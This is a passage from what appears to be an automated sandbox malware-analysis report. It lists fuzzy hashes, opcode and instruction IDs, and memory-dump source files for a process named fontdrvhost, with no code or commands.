                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 226a74ace4f2acf4c13a48303effbae7361bca2ce51586e4ee9b4833a44d84db
                                                                                                                                                                                              • Instruction ID: 2c99f090bbf9a7d4d1c277db951e79cf0fcbfd310675983957b0ac59a430b1e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 226a74ace4f2acf4c13a48303effbae7361bca2ce51586e4ee9b4833a44d84db
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB81A130A1E64E8FEB65DBB488A1ABCBBE1FF49300F5105BAD00ED71E5DA2869418751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d1606790132e3f475498a026b8d8f9fced30fe0f149149e6bedf667f629b88b6
                                                                                                                                                                                              • Instruction ID: 599940eb21346bdc5bb6c60317130705eac6145b45ba08434d63b98e85cc6932
                                                                                                                                                                                              • Opcode Fuzzy Hash: d1606790132e3f475498a026b8d8f9fced30fe0f149149e6bedf667f629b88b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8681D430E2E54F8FE7A5DBB888A56BE7BA1FF45301F5101BAD00ED71E5DA286A418701
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a58a8cc00ea80fb3b633960d183f2e81a51893c204f0f013a0b25eb5bc847554
                                                                                                                                                                                              • Instruction ID: 916f3fda03ce6810d9c63b91c6da0d39eef615dc342e28c807d13933432930e9
                                                                                                                                                                                              • Opcode Fuzzy Hash: a58a8cc00ea80fb3b633960d183f2e81a51893c204f0f013a0b25eb5bc847554
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6713B35B1E58D4FE778DA7888A65BC77D0FF44310B0602B9D49ECB5B2DE18AA068741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9c4f8c2f77b8035ad442932a7572605801f4f7829a8f8d4e69cff7de21dab831
                                                                                                                                                                                              • Instruction ID: d2404173708f1d008a27e3317fd9c53f9928f7c418edb8e5be754e5ccb3072d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c4f8c2f77b8035ad442932a7572605801f4f7829a8f8d4e69cff7de21dab831
                                                                                                                                                                                              • Instruction Fuzzy Hash: D361F130B1AB4A4FD3A9DB64C1E15B577E2FF45300B41497DC48A87AA2DB28F942CB80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 49035463db92fc6f97e47bd9649177b94defeac3c610b508e1500208e2e68516
                                                                                                                                                                                              • Instruction ID: b84424e1c678dc2830d27670252a2139bcdcb9156a8eb83ba24dbd79b65a8ba6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 49035463db92fc6f97e47bd9649177b94defeac3c610b508e1500208e2e68516
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54513270E0D54E5EEBA89B6888B9AFCB7A1FF51300F4041FAC05EC7196DD786A818B41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2917af21be47fe77235aee027627985f1d57b85d4285d29ee189863f479b3bda
                                                                                                                                                                                              • Instruction ID: a6c614a484242a467696c1cb2c66f362888a0a76a4d0bb601e0506103e18c916
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2917af21be47fe77235aee027627985f1d57b85d4285d29ee189863f479b3bda
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F412A57F0FA960EE726A7BCAC764E83B90DF91328B0905F7D0988F1D3E81969474291
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bf4c6819457805e4731f67c3d5464265f0128604d6b706a38625d2b04cf8db97
                                                                                                                                                                                              • Instruction ID: da52b92cc2667b342deffe6cc8ddc7cdc64b26b6d2293a275968e698429250e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf4c6819457805e4731f67c3d5464265f0128604d6b706a38625d2b04cf8db97
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15412B22B1CD695FE31DB7AC74A9AF977C1DF48325B0404BBD05DC71EBED68A8428284
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f3153b9e29698eb65f90c5700c649f06e095bf0e9b7fa95e16898c3de1b35ddf
                                                                                                                                                                                              • Instruction ID: 295c53bf7cc346b1b0a114cda31327d9e57e9c27407399b0f2b411545bd6b6e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: f3153b9e29698eb65f90c5700c649f06e095bf0e9b7fa95e16898c3de1b35ddf
                                                                                                                                                                                              • Instruction Fuzzy Hash: F041A77160C9488FDF9CFF68C4A5EA477E1FBA8314B0541AAD00EC3196DE25F841CB41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bccdeab51f2d767aa277c0a0459ebcd96346d20dba638133d283c63a707ce4fb
                                                                                                                                                                                              • Instruction ID: 52c4c215e5771f715e31b0846d716f0f395e7f14034ad7c3b6bd6b18a002bf2a
                                                                                                                                                                                              • Opcode Fuzzy Hash: bccdeab51f2d767aa277c0a0459ebcd96346d20dba638133d283c63a707ce4fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: F141717260C9488FDF9CFF68C4A5DA8B3E1FBA831471411AAD04EC71A6DE35E945CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 46e0915450ad3452d49b718fc2af6977cbf570b108187c610fe406c94ad75ab7
                                                                                                                                                                                              • Instruction ID: 32d4272d8cba2bbbbf95a867bf26be3d36397fd2f210cfbe426cfa959f4ee243
                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e0915450ad3452d49b718fc2af6977cbf570b108187c610fe406c94ad75ab7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C31827160CA488FDB9CFF28C4A5E6477E1FBA831470542AED44EC71A6DE25F881CB91
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 94196166420f02e7133823b4e7b4ad0866cc94125d4d839965930b18f58df803
                                                                                                                                                                                              • Instruction ID: 9e5fa4936365463edc3d6c070e16236cda487b35e4be9f0bb0bac6e536f8d14f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 94196166420f02e7133823b4e7b4ad0866cc94125d4d839965930b18f58df803
                                                                                                                                                                                              • Instruction Fuzzy Hash: A931917160C9488FDB5DFF68C4A5EA473E1FBA831471411AED04AC71A6DE35F845CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
                                                                                                                                                                                              • Instruction ID: e996e6777afe14103f7e51a044a179589c6dbcc18bec8b7b984fa32859bab316
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21B43130DC194FE768EB5CE88ADB973D1EF9932170501BAE59AC7136E921EC8287C1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fcb7934531ac5a7a80cd3168f5ca558ba7be9b8557a4287204e7319a4ae6d879
                                                                                                                                                                                              • Instruction ID: 4a3f606e194f8e9fe07b754a19142d76e9c446a8a0eafff866029914e585250e
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcb7934531ac5a7a80cd3168f5ca558ba7be9b8557a4287204e7319a4ae6d879
                                                                                                                                                                                              • Instruction Fuzzy Hash: D831827160CA498FDB9CEF68C4A5EA477E1FBA831470542ADD04EC71A6DE25F881CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 38f44424a70567ed0e724a2f3a71e5e352f84dce765a977f7fd38560fc4d8bbf
                                                                                                                                                                                              • Instruction ID: 8da05ba8afc476b8f18f76f3c0c683a9f863376c32396bfb4d27b48b9539102d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 38f44424a70567ed0e724a2f3a71e5e352f84dce765a977f7fd38560fc4d8bbf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2331827160C9488FDB5CFF68C4A5EA473E2FBA831071411AED04AC71A6DE35F845CB81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 150e0cffaa8f8371597bfed9afde9929b3bd66942f1f38dbae844ebb838a2239
                                                                                                                                                                                              • Instruction ID: b14084d95796862f45afebc9afc491645c2b026c92263eabf43a21ffa36823ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 150e0cffaa8f8371597bfed9afde9929b3bd66942f1f38dbae844ebb838a2239
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F313530709A4A4FD7A4DF79C5A16E97BE1FF49310F04097ADA8AC36A2DB24F5158780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 29b7ca1d3fc71dbd0e289e0fe98c22d63e419daaa93c5d426070193f66ff73eb
                                                                                                                                                                                              • Instruction ID: db1387d629992f92a4a03da5a078273a09df2d0b768bd1e01a4fcec0dd1fed7f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 29b7ca1d3fc71dbd0e289e0fe98c22d63e419daaa93c5d426070193f66ff73eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8831C471B1A90E8FDB68EBACC4A29ACF7A1FF59310B054178D05ED7192CF24B912C740
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ff52f015c2fb23d27b3e9e2711a5cf4ec878cf09c7a3d74f5b9b3302a5d14163
                                                                                                                                                                                              • Instruction ID: a8f4236b0b346a3ccc50e750661d3367295d92fe6984d519a5d190391ea351c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff52f015c2fb23d27b3e9e2711a5cf4ec878cf09c7a3d74f5b9b3302a5d14163
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1931F970E1A54ECFEBA8DBA484A55BD7BB2FF54300F52017AD40ED71A1DA39BA408B41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d5474a09659f50daf5104413cb1963d813e6e6b6ac613e64df1b2516f382a2eb
                                                                                                                                                                                              • Instruction ID: d18ff62ca6202984a557dc97752af53a118ba4efd40d5e661d64ed04cccae169
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5474a09659f50daf5104413cb1963d813e6e6b6ac613e64df1b2516f382a2eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50315B32B1DA4D8FE726ABA898251EC7760EF45324F0541F3D058CB1E3D9382A8A8751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cd76792dedcb1fea90cfb5f835b3dfd94ff13179641e97178b5b60ba107173ec
                                                                                                                                                                                              • Instruction ID: be16edb9d7aeee8efd915d5c6ec33b3482a5512122e3dba0cc9da688e53d42b3
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd76792dedcb1fea90cfb5f835b3dfd94ff13179641e97178b5b60ba107173ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03313C30A1E54ECFDBA8DBA484A16BD77B1FF44301F52417AE42ED71A1DB386A608B41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bed28f027eabab193eeda516708f3ba996080bf772db79758b224168056d75e2
                                                                                                                                                                                              • Instruction ID: 7c7e30805f8d47beb8b1d3954197d0454d1fb1cc9bc235f2c658849da1a406b5
                                                                                                                                                                                              • Opcode Fuzzy Hash: bed28f027eabab193eeda516708f3ba996080bf772db79758b224168056d75e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 16319271B1990E8FDB58EBACC4A19BCB7E1FF59310B054279D05ED72A2CB24B912C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1eef3df9d0096b7687d5a7300ca61d3b3ad6fd3e4783f35acff6e4bccfb96cd8
                                                                                                                                                                                              • Instruction ID: 0239cb2a40a62904da5b15997afc8ec8ea5de202c07bbb73dfd49127ff552177
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eef3df9d0096b7687d5a7300ca61d3b3ad6fd3e4783f35acff6e4bccfb96cd8
                                                                                                                                                                                              • Instruction Fuzzy Hash: CC31B330A0DA8E8FDB56EB64C8649B97BF0FF5A300B0905FBC019D71A2DE38A945C751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5d1b69c04e47f6fe0e72f49156210118fa45effd6683ccfa19c9a14bb548c538
                                                                                                                                                                                              • Instruction ID: 6b3945da3e89468f6e546e5bc093905b29a81731babca87af6c0c42f2fd0dae1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d1b69c04e47f6fe0e72f49156210118fa45effd6683ccfa19c9a14bb548c538
                                                                                                                                                                                              • Instruction Fuzzy Hash: AA212920F29D6D0FE798B7AC946967572C2EB9C315F5100B9E41DC32FAEC78AC414281
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c6f89bd01d6c2241b0b4cbd73080a4b4e51b0517e4eee497aabb40da6802bb65
                                                                                                                                                                                              • Instruction ID: 77275f2c4a803ecfc6ac870e514d9ea89dd11cb880843890e2ff44922e68387c
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6f89bd01d6c2241b0b4cbd73080a4b4e51b0517e4eee497aabb40da6802bb65
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB314C74A1991D8FDFA8DB6884A1BEDB7B1FF68310F0000BDD04EE3295CE356A818B00
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: dbdb5b3dd7eab7f33ac6b888c463f4d917f903fa5f3ecb63660ab0ddf4311faa
                                                                                                                                                                                              • Instruction ID: 0383d974c22ea940976b575d13185123d429010c9efdd4836db0f699087a36e8
                                                                                                                                                                                              • Opcode Fuzzy Hash: dbdb5b3dd7eab7f33ac6b888c463f4d917f903fa5f3ecb63660ab0ddf4311faa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D21F971B0E94D4FE755E7B848B2ABC77E1FF55310F1501BAD05DC75A2DA1869028350
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 6ca00a08c4f1bc42c8087324db8dbee6102714330e9407d682471e659c220e40
                                                                                                                                                                                              • Instruction ID: 4bd527eb3cf09cdad16ea50dd4b15fd1268b66c45dc3bc1285e85a2adb378990
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca00a08c4f1bc42c8087324db8dbee6102714330e9407d682471e659c220e40
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF315B20A1E5EA5BE739826844F097C7B61EF5130072982FED09ACB0EBC91CB581E351
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 715d91426446690b5bdf4f62829ca02e1a435eb8a6458a28c67611c00c610b54
                                                                                                                                                                                              • Instruction ID: f63e44b3264554fad85c61295cccea1b0d58786ac19dc29b7d6701eceaf99f09
                                                                                                                                                                                              • Opcode Fuzzy Hash: 715d91426446690b5bdf4f62829ca02e1a435eb8a6458a28c67611c00c610b54
                                                                                                                                                                                              • Instruction Fuzzy Hash: 24315210A1D5DA5AE739837444B85787F91EF52310F1945FAC08FCB4EBC4ACBA85C761
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5b80faa4ff0d5fc77326a3ff5937095cfc5fc4d6db05bc7a1ccacead3363f532
                                                                                                                                                                                              • Instruction ID: c29b6ac5570ccef75f9cf875cbc6b7e76fa2fcbf61e7a83bb80d850896e78bea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b80faa4ff0d5fc77326a3ff5937095cfc5fc4d6db05bc7a1ccacead3363f532
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F210835A0991D8FDF99DB68C8A1AEDB3B1FF68310F1001ADD04EE3295CA35AA41CB00
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e0b782027eaa0b262873091f6f956549979214040d1091cc7c320528d729890
                                                                                                                                                                                              • Instruction ID: a7abf67de89d47c0e3dd8cab2048e76f3504ce6ef8b892b627d8122945819173
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e0b782027eaa0b262873091f6f956549979214040d1091cc7c320528d729890
                                                                                                                                                                                              • Instruction Fuzzy Hash: C0210C71E1591D9FDF98DB58C4A5AECB3B1FF68300F0141AED00EE3291CA35AA418B50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
